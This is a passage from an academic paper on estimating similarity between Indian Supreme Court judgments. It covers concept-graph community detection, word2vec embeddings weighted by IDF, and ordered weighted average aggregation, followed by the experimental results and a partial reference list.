the system. There are studies (Koniaris, Anagnostopoulos & Vassiliou, 2017) emphasizing on the need for going beyond a single homogeneous similarity value for more effective legal information retrieval. In this proposed work, we present the legal document similarity estimation as a multi-criteria decision-making (MCDM) problem. We specifically focus on the problem of finding the similarity among court judgments for the Indian Supreme Court judgment corpus. We extract prominent concepts which are considered as criteria and extract representative sentences for each of the criteria. Using these sentences, we then generate a concept similarity matrix for the concepts extracted from the documents. Every value in the similarity matrix represents weight for the criterion and final similarity value is calculated using the ordered weighted average (OWA) operator. Thus, the approach provides two abstractions of relevance between a judgment pair: (1) At the concept level as a matrix of similarity values; (2) at the document level as single similarity value obtained by aggregating concept level similarity. Experimental results demonstrate the effectiveness of our proposed approach for the extraction of relevant judgments. In addition to the enhanced performance of relevant judgment retrieval, this approach enables informative visualization of results that provide deeper insights into the relevance obtained. The remainder of the paper is organized as follows; the next section, ‘Materials and Methods’, elaborates the steps of the proposed approach in detail. The section ‘Experimental Evaluation’ discusses the experimental set-up and provides the details on the data set and implementation framework used in the proposed work. We present results and discussion on obtained results in the ‘Results and Discussion’ section where we compare the results with existing work in LIR for Indian Legal System. We further Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 3/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 highlight the effectiveness of our work. We conclude with a note on the future direction for the proposed work in the ‘Conclusion’ section. MATERIALS & METHODS Semantic matching of documents is the most fundamental activity of LIR. Generically, textual units of different granularity viz. words, phrases, sentences, paragraphs and even complete documents are used for establishing semantic relevance between user’s query and documents. Embeddings are obtained by considering word neighborhood as the context, and hence capture the semantics of text even without exact word match. These methods are very effective and popular for all NLP tasks across the domains (Onal et al., 2018). One of the limitations of deep learning based vector embedding as highlighted in (Moody, 2016) is the inability to provide interpretative insights. Judgment documents are complex and lengthy. The estimation of similarities among long documents requires a different approach as the similarity has to be modeled as a function of the concepts present in the documents (Liu et al., 2018). Moreover, since the concepts may be scattered throughout the body of the text in a document, a well-defined approach for identification of concepts is required. In this paper, we propose a three-step approach for finding con- cept based similarity among court judgments: (i) Identification of main concepts/topics of the document (ii) Extraction of the text under every concept (iii) Similarity calculation using suitable measure. These steps are explained in detail in the following sub-sections. Identification of basic concept words Natural Language Processing (NLP) offers a wide range of methods and approaches for the identification of topics from a document. Traditional TF-IDF based vector space model and Latent Dirichlet Allocation (LDA) use the distribution of words (Moody, 2016) in the document to extract topics. These methods do not consider word neighborhood and are based on exact word match. Graph-based extraction of topics is another popular approach (Ying et al., 2017 and Sayyadi & Raschid, 2013) for identifying the broad themes in documents. These methods are based on establishing a relationship between words/concepts using estimates such as co-occurrence, semantic similarity, etc. for extraction of prominent topics in a document. Variants of the above two approaches are popularly used for topic identification and available as off-the-shelf tools for identifying prominent words in the document. We propose employing a variation of the graph-based method for identifying topics and utilizing it to obtain important segments of the judgment. Let L={L1,L2...,Ln}be the set of ‘n’ legal judgments in the corpus. Let n(Li) be the set of sentences in the legal document Li and let Lij be the ‘j’th sentence of the ‘i’th legal judgment document. As the first step in the pre-processing of documents, we construct the base concept words as the nouns present in sentences in the judgment. Liu et al. (2018) propose extraction of keywords as basic concepts where authors demonstrate similarity estimation for news reports using concept interaction graph. Specific and distinctive characteristics of legal documents require a domain-specific approach for the extraction of concepts from the documents. While a person’s name may have a lot of relevance in a news report, it just Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 4/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 represents a party (respondent or appellant) or a participant in the case and does not actually contribute to any legal concept present in the judgment. Therefore, we ignore references to specific people, place etc. which appear as proper nouns from the input in the document, and we define base word concept set of the ‘j’th sentence in the ‘i’th document, B ( Lij ) , as: B ( Lij ) = { x ∈Lij ∣∣pos(x)= ′CommonNoun′and x ∈=(Lij) (1) Here pos(x)stands for part of speech of the word x and=(Lij) represents the important words in the sentence Lij. We consider a common noun appearing in the sentences as concepts and construct a concept interaction graph using concept co-occurrences. However, we are selective about the nouns appearing in the concept graph and only allow important nouns to represent the document fragments. TF-IDF, term frequency- inverse document frequency method is the most fundamental weighing scheme used in an information retrieval system. TF-IDF computes weight for a term in a document collection by assessing its local relevance using term frequency within the document (TF) and global relevance by computing inverse document frequency for the entire document collection (Ramos, 2003). To assess this importance of the nouns we use TF-IDF model constructed for individual judgment by considering every sentence in a judgment as a separate document. The judgment, therefore, can be deemed to be a collection of documents (Lij,j�1...n(Li)). Therefore= ( Lij ) can be determined as: = ( Lij ) = { x ∈Lij ∣∣tf (x,Lij)×idf (x,Li)> mean k�[1,n(Li)] (tf (x,Lik)×idf (x,Li)) (2) where tf (x,Lij) is the term frequency of the word ‘x’ in the sentence Lij, idf (x,Li) measures the uniqueness of ‘x’ across the document Li and the words having TF-IDF above the mean TF-IDF score over the document are considered important. Identification of main concepts/topics of the document Detection of related words in the judgment document is an important step and this is assessed based on the proximity of the base concept words. A concept graph Gi = (Vi,Ei) of a legal document Li, is constructed using the base concept words s.t. Vi =⋃ j∈[1,n(Li)]B ( Lij ) and Ei = {( x,y ) |co−occurrence ( s,y ) >3 } . The set of vertices Vi is the set of all base concept words across all sentences in the document and two concept words nodes in the graph have an edge between them if their co-occurrence count is above 3 i.e., they appear together in at least three of the sentences. We use the count of co-occurrences as the strength of association between two concepts words. Less than 3 co-occurrences of concept words may represent mere coincidence and hence we do not deem such associations as strong enough for addition of edge in the graph. Figure 1 shows a concept graph constructed from a document fragment. To discover important topics in the document we employ Louvain Modularity com- munity detection algorithm (De Meo, 2011). The algorithm tries to locate communities by trying to maximize the modularity i.e., the ratio of the density of edges inside each community to the density of edges to nodes outside the community. The algorithm runs iteratively by first identifying small communities with high modularity and then proceeds Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 5/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 Figure 1 Sample Concept graph for a judgment document fragment. Full-size DOI: 10.7717/peerjcs.262/fig-1 to enlarge the communities by grouping them to achieve the maximum increase in mod- ularity. We use the best partition method in the python networkx module, for detecting concepts in the document (Community detection for Networkx’s Documentation, 2010). Figure 2 shows an example of communities so evolved for a pair of judgments. Let mi be the number of communities learnt for the document Li and let the communities so detected be Ci1,Ci1,...,Cimi. Each community thus identified is considered as a prominent concept which is represented by a set of words that formed the nodes in the initial concept graph. Representative sentence selection and similarity estimation Once the main concepts, represented as word communities, in the document are identified, for each concept the top five, most representative sentences for that concept are selected. TF-IDF scoring is used for this purpose. Each concept Cij, is a collection of words and can be considered as a document, similar to how each sentence in Li is considered a document (Eq. (2)). Cosine similarity is computed between vectors representing each sentence in the judgment with the vector representing the concept. The five most similar sentences to the concept Cij are chosen as sentences representing that concept in the judgment Li. Our aim is to construct a vector representation of each concept occurring in a legal judgment which can capture the degree of occurrence of various ideas. These vector representations of concepts can ease the computation of similarity between two judgment documents. Let Skij be the kth representative sentence for the ‘j’th concept in ‘i’th legal document. The vector representation of each concept can be derived in various ways, the simplest one, being averaging the TF-IDF scores of Skij,k ∈[1,5] i.e., averaging the TF- IDF scores for all sentences representative of a concept. However, we leverage on recent advances in neural networks, to take advantage of the potential knowledge captured by word embeddings. Word embeddings convert each word into a multi-dimensional vector of features in such a way that the vector representation of related words has high Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 6/20 https://peerj.com https://doi.org/10.7717/peerjcs.262/fig-1 http://dx.doi.org/10.7717/peerj-cs.262 Figure 2 Communities derived from a judgment document. Full-size DOI: 10.7717/peerjcs.262/fig-2 similarity. Word embeddings are often trained on huge real-world datasets and thus are able to capture the semantics very effectively. In addition, word embeddings obtained through popular methods like word2vec (Mikolov et al., 2013) have the property of additive compositionality i.e., the ability of the sum of word vectors of words composing a sentence/paragraph to preserve the semantics contained therein. Studies indicate that a word representation obtained using a combination of neural embeddings and TF-IDF provides is more effective (Lau & Baldwin, 2016) than the just the vector representations in many NLP tasks. Hence, we use IDF value for every word as weight applied to the vector of the word obtained using word2vec. We compute the vector Wij corresponding to each concept Cij using two methods namely word2vec and IDF weighted word2vec and resultant vectors for these methods are computed using Eqs. (3) and (4) respectively. Wij = 5∑ k=1 ∑ x∈Skij word2vec(x) (3) and Wij = 5∑ k=1 ∑ x∈Skij word2vec(x)∗IDF(x) (4) Here the summation involves vector addition of the word vectors of words belonging to each of the five representative sentences for the concept Cij. The above-computed vector representation for each concept present in the judgment is finally used to compute the similarity between judgment documents. The notion of Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 7/20 https://peerj.com https://doi.org/10.7717/peerjcs.262/fig-2 http://dx.doi.org/10.7717/peerj-cs.262 similarity among documents, sometimes, may not be sufficiently captured by single similarity value. Two documents may be similar to each other to different degrees when observed using different viewpoints. As an example, two legal documents may be similar because of commonalities in the case history but may be different in the way the cases were argued. On the other hand, two other legal documents may have nothing common in terms of the facts of the case but both may be overturning the judgment made by a lower court. To that extent, the two cases can be considered similar. When similarity computation is employed for judging the closeness of two documents, the context of the search may be unknown. In such cases estimating similarities using different notions and visualizing the same may be more helpful to the user than obtaining a single similarity score. The ability to derive multiple vector representations for various concepts contained in a legal document in this proposed approach could aid in finding different levels of similarity between a pair of legal documents. Let La and Lb be two legal judgments consisting of na and nb concepts respectively. We compute the similarity between each pair of concepts in La and Lb. Let sim(Cai,Cbj) be the similarity between the ‘i’th and the ‘j’th concepts of the documents La and Lb, respectively. In this way, we obtain na×nb similarity values. We use these similarity values to establish links between concepts across the two documents. For the proposed approach, we only allow each concept to participate in a maximum of one link. Modifications to this restriction are always possible and could possibly result in different similarity links and visualization result. The concepts in the two documents having the highest similarity value are linked using a similarity link. The documents which have already been linked are removed from further linking. This process is repeated taking the next two concepts one from each of the documents which are most similar and so on. The linking of highest matching concepts between a pair of judgments would be referred to as concept matches and an example of such a concept match is illustrated in Fig. 3. It is to be noted that in Figs. 2 and 3 only the concept words are shown (rather than the representative sentences) for ease of understanding. The strength of the lines connecting various concepts across the judgments are indicators of the level of match between the concepts. We present the following two examples to support the above explanation and to demonstrate how the proposed method is able to facilitate multi-level concept matching and visualization. Example 1: A judgment pair discusses accident as a common theme but the facts in individual case result in multiple communities. Whereas there is a high similarity match in the discussion about the accident incident itself (Concept 1 in both judgments - shown as a bold link between the two), there is little match in Concept 2 of the pair, the first talks about charges of homicide whereas the second talks about negotiating the amount of compensation for the dependents of the deceased. Example 2: A judgment pair with discussion on intellectual property rights (IPR) and copyright. The two cases present different dimensions of IPR. Case 1 discusses IPR with respect to copyright of literary work whereas case 2 discusses copyright on customer database as a business secret. Concept 2 and Concept 1 for the pair have a high likeness since these statements talk about property rights and infringement in general; the Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 Figure 3 Concept based similarity—examples showing a substantial match through one concept but negligible match in another. (A) Concepts derived from accident related cases. (B) Concepts derived from copyright related cases. Full-size DOI: 10.7717/peerjcs.262/fig-3 other two concepts in the judgments discuss copyright w.r.t. books while in the second judgment the unmatched concept discusses copyright on a database, trade, etc. Example visualization for the above two situations is shown in Fig. 3A and Fig. 3B respectively. It is to be noted that the colors of the concept nodes are representative of the degree of closeness of the concepts. The different levels of similarity so obtained can also be aggregated to compute a single similarity value which could be useful for finding all relevant documents to a given judgment. Given the various similarity values viewed from different perspectives between two judgments, we employ the Ordered Weight Averaging operator for aggregating the various similarity values into one. OWA is a family of aggregation operators introduced by Yager (2003) has a special application for multi-attribute decision-making problem especially in the presence of fuzzy data and allows for the incorporation of linguistic cri- teria for aggregation. Specifically, if there are items in a domain that need to be evaluated according to ‘p’ criteria ( T1,T2,...,Tp ) s.t. Tj(item) is the extent to which ‘item’ satisfies Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 9/20 https://peerj.com https://doi.org/10.7717/peerjcs.262/fig-3 http://dx.doi.org/10.7717/peerj-cs.262 the ‘j’th criterion, then it is possible to use the family of OWA aggregation operators to evaluate the degree to which ‘item’ satisfies ‘‘some criteria’’, ‘‘all criteria’’, ‘‘most criteria’’ etc. In the case of similarity estimation in the present case, we can consider the pair of judgments to be the item and the various possible criteria could be: degree of Match in facts of the case, degree of match in case citations, degree of Match in the defense counsel’s argument, etc. In this case, the pair of judgments would be evaluated according to each of the criteria and according to our choice of linguistic aggregation needed i.e., most, some, etc, the overall similarity can be computed. It is to be noted here that the set of criteria for legal judgments is not fixed and is determined for each document pair based on the concepts derived in each document. The OWA operator (Yager, 2003) is defined as Definition: OWA Operator A function f : Rn → R is called on Ordered Weighted Averaging (OWA) operator of dimension ‘n’ if it has an associated weighting vector W of dimension ‘n’ such that: (1) n∑ i=1 Wi=1 (2)Wi∈[0,1]∀i=1,2···,n Where, F is defined as F(x1,x2,...,xn)= ∑n i=1Wiyi, where yi is the ‘i’th largest value in the set of elements {x1,x2,...,xn}. OWA can be used to emulate different aggregation operators such as max, min, average, etc, by adjusting the weights Wi,∀i=1,2···,n, suitably. These linguist operators fall in between the extremes of ‘‘at least one’’ to ‘‘all’’. In the current work, we propose to use the ‘‘most’’ aggregation operator. In this paper, we just outline the method of arriving at the weights for the OWA operator and do not discuss the reasoning behind it. An in-depth presentation of the OWA operators is presented in (Carlsson & Fullér, 1996). If there are ‘p’ criteria for evaluating the similarity between a pair of documents (i.e., p concepts matches between a pair of documents), then we define an operator Qmost, corresponding to the linguistic quantifier ‘‘most’’ as Qmost(x)=x2. Then the weights for the OWAmost operator can be determined by the formula (Carlsson & Fullér, 1996) as: W(i)= Q ( i p ) −Q ( i−1 p ) (5) Figure 4 depicts similarity estimation using OWA as described above for a sample pair of judgments. As shown in the figure, for the first judgment (Doc1), three concepts are identified which are represented using three corresponding set of words. For the second judgment (Doc2), two concepts are identified. The computation of similarity depicted in the figure is performed on the sentences representative of these concepts as explained above. Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 10/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 Figure 4 Similarity computation using communities derived for a pair of judgments. Note that the concept node colors reflect the similarity between concepts. Full-size DOI: 10.7717/peerjcs.262/fig-4 The similarity so computed for various documents can then be used to rank judgments in order of relevance to a query judgment. Table 1 depicts the sample results obtained for a pair of judgments ranked as similar (ranked as 8 on a scale of 1–10) by human expert. Weight in the Table 1 represents the similarity of the sentence with the identified concept. Using the proposed approach of similarity estimation using OWA, a similarity score of 0.82 is obtained for this pair of judgments. The following few sections present the efficacy of the proposed method using various experiments. EXPERIMENTAL EVALUATION We use Indian Supreme Court case judgments from years ranging from 1950 to 1993 for this study. These documents are used during the training phase to learn vector representations for words. Case judgments used for the experiments in this work were crawled from website http://www.judis.nic.in. Experimental setup Some of the judgments documents are extremely small and may not reveal any pattern. We considered 9,372 judgments with a length of more than 10 sentences for this work. These documents are cleaned by removing the metadata information about the date, judge’s names, bench details, etc. While this information may be required for searching a particular case, it doesn’t contribute to the similarity among case judgment. Judgments contain a lot of non-text information like section and rule numbers, specific number and Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 11/20 https://peerj.com https://doi.org/10.7717/peerjcs.262/fig-4 http://www.judis.nic.in http://dx.doi.org/10.7717/peerj-cs.262 Table 1 Extraction of concepts and representative sentences—sample results. Case Concept Most Representative Sentences for the concept Weight Case 1 ‘author’, ‘time’, ‘detent’, ‘order’, ‘ground’ ‘When the Act contemplates the furnishing of grounds of detention ordinarily within five days of the order of detention the intention is clear that the statements and documents which are referred to in the grounds of detention and which are required by the detenu and are expected to be in possession of the detaining authority should be furnished with reasonable expedition. 0.583 ‘‘That was obviously necessary because the information leading to the order of detention was laid by the Customs authorities.The grounds of detention were also served on her on the same day.It was received by the Home Department of the Delhi Administration on January 11, 1980 but was actually placed before the Administrator on January 19, 1980 when the detaining authority confirmed the order of detention. 0.447 The authorities who laid the information before the detaining authority and who were primarily concerned in the matter were the Customs authorities via the Director of Rev- enue Intelligence. 0.335 ‘detenu’, ‘repre- sent’, ‘hear’, ‘delay’, ‘right’ ‘There was inexcusable delay in enabling the detenu to make a representation and indis- posing of the representation.In Sukul\’s case (supra) the Court also made certain perti- nent observations (at pages 231–232):\n’’No definite time can be laid down within which a representation of a detenu should be dealt with save and except that it is a constitutional right of a detenu to have his representation considered as expeditiously as possible.(supra) the detenu made his representation on 4th and 6th of March 1978, the Advisory Board gave a hearing on 13th March and the detaining authority rejected the representation on 18th March. 0.516 The rejection of the representation was communicated to the detenu on January 17, 1980. 0.462 We have ourselves examined the records and we find that though the Administrator con- sidered the representation of the detenu after the hearing by the Board, the Administrator was entirely uninfluenced by the hearing before the Board. 0.374 Case2 ‘order’, ‘detent’, ‘opin- ion’, ’ground ‘Under section 7 of the Act grounds of order of detention are to be disclosed to the per- sons affected by the order not later than 5 days from the date of detention and the Act fur- ther requires to afford the person affected by the order the earliest opportunity of mak- ing a representation against the order to the appropriate Government.On 6 January, 1969 the Governor was pleased to confirm the order of detention after the Advisory Board had given opinion that there was sufficient cause for detention of the petitioner. 0.540 By an order dated 26 August, 1969 the Governor was pleased to confirm the order of de- tention of the petitioner.(2) the opinion of this Court in the case of Sk. Section I I of the Act states that the Government may confirm the detention order if the Advisory Board gives an opinion to that effect.’ 0.516 ‘detenu’, ‘releas’, ‘mat- ter’, ’section7′, ‘right’, ‘action’ ‘If thereafter the Advisory Board will express an opinion in favour of release of the detenu the Government will release the detenu.If the Advisory Board will express any opinion against the release of the detenu the Government may still exercise the power to release the detenu. 0.527 If the appropriate Government will release the detenu the Government will not send the matter to the Advisory Board. 0.333 Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 12/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 naming conventions used for references that include special characters that need to be preserved. Such information poses challenges in the pre-processing task and demands a domain-specific pre-processing which is important for deciding similarity. Following pre-processing steps are used in our work (a) Preserve numbers and special characters wherever significant by removing space between word and number. Used for citation objects with numbers For Example section 23 converted to section23, clause 3(a) converted to clause 3a. (b) Use common nomenclature for citation objects(IPC <->Indian Penal Code, Constitu- tion of India <->Indian Constitution etc.).( Guide to Legal Citation, 2010) (c) Perform generic linguistic pre-processing of case conversion, English stop word removal stemming and lemmatization, punctuation and number removal. Only numbers as words are removed i.e., section 23 retained but a number 456 removed. (d) Remove Legal stop words. Some words (e.g., petitioner, petition, respondent, court, etc.) appear in almost every judgment. We construct legal stop word set forming a list of words having the highest frequency across all documents and remove these words from the documents. The set of 9,372 judgment documents pre-processed as above is used for training in the proposed work to obtain word embedding and TF-IDF weights for words which are used for calculation of similarity. We used Gensim package Word2Vec library (Gensim, 2014) for implementation. Word2Vec function is trained on pre-processed judgment corpus. The function results in a vector representation of every word of the considered documents. We experimented with different vector dimensions for training Word2Vec. Best results were obtained for vector dimension 100 which is used for all the experiments in this work. We used Gensim TF-IDF library (Gensim, 2014) for obtaining TF-IDF weights for the words in the document collection. EXPERIMENTAL RESULTS AND DISCUSSION Similarity estimation for legal documents facilitates two primary operations in LIR namely pairwise similarity estimation and extraction of relevant judgments from a collection of documents. The value of pairwise similarity obtained for a pair of docu- ments, can guide a user in establishing the parallel the between two documents whereas similarity of a document with all other documents can be used for ranked retrieval in LIR. We evaluate our experiments of finding similarity among legal documents with the help of two different test approaches. We use binary classification for estimating pairwise similarity and information retrieval techniques to demonstrate the effectiveness of proposed approach in extraction of relevant documents. The following sub-sections elaborate these test approaches and the metrics used for the evaluation of the results. 1. Pairwise similarity estimation—We use the proposed approach of similarity esti- mation using OWA operator for finding similarity between a pair of case judgments. In the absence of test data for concept-wise similarity, we compare the results of our proposed approach with existing work for estimation of single similarity value for a judgment pair. We used the gold standard test dataset (Kumar et al., 2013; Mandal et Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 13/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 al., 2017a; Mandal et al., 2017b) for this evaluation. The dataset contains relevance score given by human experts for 47 pairs of judgments of the Supreme Court of India. For every pair, experts have given similarity ratings with values between 0– 10. Finding similarity among case judgments using various approaches is presented in Mandal et al. (2017a), Mandal et al. (2017b) where authors have highlighted the superiority of results obtained using the document embedding approach, Doc2Vec (Le & Mikolov, 2014). To evaluate the effectiveness of our proposed approach in identifying if a pair of judgment is similar or dissimilar, we use a simple binary classification approach. A judgment pair is labeled as similar if the obtained similarity value is greater than the chosen threshold value. We normalized expert scores to transform values in [0, 1] range and experimented classification with different thresh- old values. Though accuracy is the most commonly used measure of a classifier’s performance, it cannot differentiate between the number of correct labels of different classes. Hence we use precision, recall and F-measure to evaluate the effectiveness of our proposed approach. In the context of the binary classification as mentioned above, precision represents the fraction of correctly classified documents among the retrieved documents within a class and is calculated using following equation (Sokolova, Japkowicz & Szpakowicz, 2006). Precision= TRUE POSITIVE TRUE POSITIVE+FALSE POSITVE Recall is the fraction of relevant documents within a class that have been retrieved from the total number of relevant documents. Recall can be calculated using the following equation. Recall = TRUE POSITIVE TRUE POSITIVE+FALSE NEGATIVE F1 is defined as the weighted harmonic mean of the precision and recall and is computed using the following equation. F1Score=2∗ Precision∗Recall Precision+Recall Precision, recall and F1 score together are used to evaluate classification effec- tiveness. Figure 5 shows the results of binary classification obtained for various threshold values. We compare our results with the existing prior work (Mandal et al., 2017a; Mandal et al., 2017b) for finding similarity among legal judgments. Thus Doc2Vec in the Fig. 5 and Table 1 represent pairwise similarity estimation using document embedding scheme reported by Mandal et al., (2017a); Mandal et al., (2017b). Table 2 presents the comparison of the results. We have included only the best case results for the experimented approaches. As described in the previous subsections, we use two vector representations namely word2vec and word2vec with idf for every word in the representative sentences for each concept. As it can be seen Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 14/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 from Table 1, our proposed approach gives results comparable with the existing approach of document embedding. It can be seen form the results that combining idf, the inverted document frequency with the word vectors results into better F1 score of 0.8 for pairwise similarity estimation. It is also to be noted that the overall F1 score of 0.741 obtained by using only word2vec is comparable with existing approach. To evaluate the effectiveness of our proposed approach, we also performed pairwise t test of statistical significance on the F1 scores obtained for individual cases in the test dataset. The test resulted into a confidence score of 90% when compared with existing approach. 2. Extraction of relevant judgments from a collection of documents—We use the proposed approach of similarity estimation for extraction of relevant judgments from a collection of judgment corpus. We use ranked information retrieval technique to evaluate the effectiveness of our approach. A judgment contains references (citations) to multiple cases for justifying the validity of arguments and decisions during the proceedings of a case. These cited cases are called as precedents and are considered to have very high relevance with the citing case. For this evaluation, we construct test data as follows • A query set, Q is constructed by hiding all the references to precedents present in the text of the judgment. We use |Q|=20 • A document corpus, DC, which, along with many other judgments contains precedents i.e., the judgments cited by judgments in the query set Q. DC is used as a document base for extraction of relevant judgments. We use |DC|=200. In the context of information retrieval, precision and recall are estimated differently than that of the classification approach and can be explained using following equa- tions: Precision= |{Retrieved Document}∩{Relevant Document}| |{RetrievedDocuments}| Recall = |{Retrieved Document}∩{Relevant Document}| |{RelevantDocuments}| . In a ranked information retrieval system, precision and recall values calculated at given cut-off k, i.e., precision@k and recall@k are used as evaluation metrics (Manning, Raghavan & Schütze, 2010). Precision recall values can be plotted to obtain Precision recall curves which provide visual exploration of retrieved results at different levels of precision and recall. Interpolating precision to next higher recall is a common practice to obtain a smoother precision recall curve (Manning, Raghavan & Schütze, 2010). Figure 6 shows sample precision recall curves obtained for a query. When cut off is taken at R, the known number of relevant documents in the corpus, it is called as R-precision which is used extensively for evaluation of results in ranked retrieval systems. We use precision@k, R-precision and recall@k for the evaluation of the results of our proposed approach. Results obtained for different values of k are Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 15/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 Figure 5 Precision, Recall and F1 score for different threshold values. (A) Precision, Recall and F1 score for Threshold value≥0.4. (B) Precision, Recall and F1 score for Threshold value≥mean of obtained sim- ilarity values. (C) Precision, Recall and F1 score for Threshold value > 0.5 (D) Precision, Recall and F1 score for Threshold value≥0.5′. Full-size DOI: 10.7717/peerjcs.262/fig-5 summarized in Table 3. We compare the results with previous work on the extraction of relevant judgments of the supreme court of India (Mandal et al., 2017a; Mandal et al., 2017b). In this work best performance of retrieval is obtained by considering only the citation context, i.e., the paragraph around the case citation in a judgment and then applying inverted document frequency, IDF for estimation of similarity. As it can be seen from the results presented in Table 2, our proposed approach clearly outperforms the existing work. We obtain the best result of 0.318 for R-precision which highlights the effectiveness of the proposed result for ranked retrieval of judgments. The proposed approach also results in higher values of recall for a smaller cut of value, k =50 ascertaining its efficacy in retrieving relevant judgments within a document collection. Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 16/20 https://peerj.com https://doi.org/10.7717/peerjcs.262/fig-5 http://dx.doi.org/10.7717/peerj-cs.262 Table 2 Pairwise similarity estimation. Approach Precision Recall F1 Score Word2vec using OWA 0.714 0.769 0.741 Word2vec idf weighted using OWA 0.706 0.920 0.800 Doc2vec 0.764 0.764 0.764 Figure 6 Sample Precision Recall Plot obtained at rank 20. Full-size DOI: 10.7717/peerjcs.262/fig-6 CONCLUSIONS Establishing relevance among legal documents is a very complex task and demands specialized approaches to similarity estimation. In this paper, we presented a novel approach of extracting prominent concepts from the document for finding the similarity among legal judgments. We presented legal document similarity estimation as a multi- criteria decision-making problem which we solved using aggregation operator OWA. In addition to the improvement in the results, the proposed approach provides multiple levels of similarities which facilitates visualization and can be useful for deeper insights into the notion of relevance among court judgments. The presented approach is entirely data-driven as the concepts to be matched are extracted intrinsically and there is no need for the user to formulate a query. The proposed approach also extracts sentences specific to every concept and set of these sentences can be used as a condensed representation for the judgment document. The proposed approach used common nouns to identify basic concept words. In future, we would like to use more sophisticated methods like named entities and entity co-references for identification of concepts. Community detection Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 17/20 https://peerj.com https://doi.org/10.7717/peerjcs.262/fig-6 http://dx.doi.org/10.7717/peerj-cs.262 Table 3 Extraction of relevant Judgments: ranked Information retrieval. Proposed approach Existing work Method used Precision @10 Precision @r Recall @20 Recall @50 Recall @100 Method Used Precision @10 Recall @ 100 Word2vec 0.205 0.243 0.638 0.805 0.916 IDF, citation context 0.236 0.781 Parsimonious language model, citationcontext 0.237 0.771 Word2vec with idf weight 0.225 0.318 0.673 0.847 0.923 Citation context 0.221 0.749 Dirichlet Prior Smoothing 0.218 0.681 algorithms based on centrality and between-ness can be explored for the identification of prominent communities. We would like to explore the possibility of introducing the concept weighting scheme based on the importance of a concept in various sub-domains of law for a deeper understanding of relevance. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Rupali S. Wagh and Deepa Anand conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The data is available at Figshare: wagh, rupali (2019): Document corpus of court case judgments. figshare. Dataset. https://doi.org/10.6084/m9.figshare.8063186.v2. REFERENCES Bench-Capon T, Bench-Capon T, Araszkiewicz M, Ashley K, Atkinson K, Bex F, Borges F, Bourcier D, Bourgine P, Conrad JG, Francesconi E, Gordon TF, Governatori G, Leidner JL, Lewis DD, Loui RP, McCarty LT, Prakken H, Schilder F, Schweighofer E, Thompson P, Tyrrell A, Verheij B, Walton DN, Wyner AZ. 2012. A history of AI and Law in 50 papers: 25 years of the international conference on AI and Law. Artificial Intelligence and Law 20(3):215–319 DOI 10.1007/s10506-012-9131-x. Branting LK. 2017. Data-centric and logic-based models for automated legal problem solving. Artificial Intelligence and Law 25(1):5–27 DOI 10.1007/s10506-017-9193-x. Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 18/20 https://peerj.com https://doi.org/10.6084/m9.figshare.8063186.v2 http://dx.doi.org/10.1007/s10506-012-9131-x http://dx.doi.org/10.1007/s10506-017-9193-x http://dx.doi.org/10.7717/peerj-cs.262 Carlsson C, Fullér R. 1996. Compound interdependences in MOP. In: Proceedings of the fourth european congress on intelligent techniques and soft computing (EUFIT’96). Casanovas P, Casanovas P, Palmirani M, Peroni S, van Engers T, Vitali F. 2016. Semantic web for the legal domain: the next step. Semantic Web 7(3):213–227 DOI 10.3233/SW-160224. Community detection for Networkx’s Documentation. 2010. Available at https:// python-louvain.readthedocs.io/en/latest/ (accessed on 28 March 2019). Cui P, Wang X, Pei J, Zhu W. 2018. A survey on network embedding. IEEE Transactions on Knowledge and Data Engineering 31(5):833–852. De Meo P. 2011. Generalized louvain method for community detection in large networks. In: 2011 11th international conference on intelligent systems design and applications. Gensim. 2014. models.word2vec Word2vec Embedding. Available at https:// radimrehurek.com/gensim/models/word2vec.html (accessed on 19 February 2019). Goyal P, Ferrara E. 2018. Graph embedding techniques, applications, and performance: a survey. Knowledge-Based Systems 151:78–94 DOI 10.1016/j.knosys.2018.03.022. Grover A, Leskovec J. 2016. node2vec: scalable feature learning for networks. In: Proceedings of the 22nd ACM SIGKDD international conference on knowledge discovery and data mining. ACM. Koniaris M, Anagnostopoulos I, Vassiliou Y. 2017. Network analysis in the legal domain: a complex model for European Union legal sources. Journal of Complex Networks 6(2):243–268. Kumar S, Reddy PK, Reddy VB, Suri M. 2013. Finding similar legal judgements under common law system. In: International workshop on databases in networked informa- tion systems. Berlin, Heidelberg: Springer. Lau JH, Baldwin T. 2016. An empirical evaluation of doc2vec with practical insights into document embedding generation. ArXiv preprint. arXiv:1607.05368. Le Q, Mikolov T. 2014. Distributed representations of sentences and documents. In: International conference on machine learning. Liu B, Niu D, Wei H, Lin J, He Y, Lai K, Y Xu. 2018. Matching long 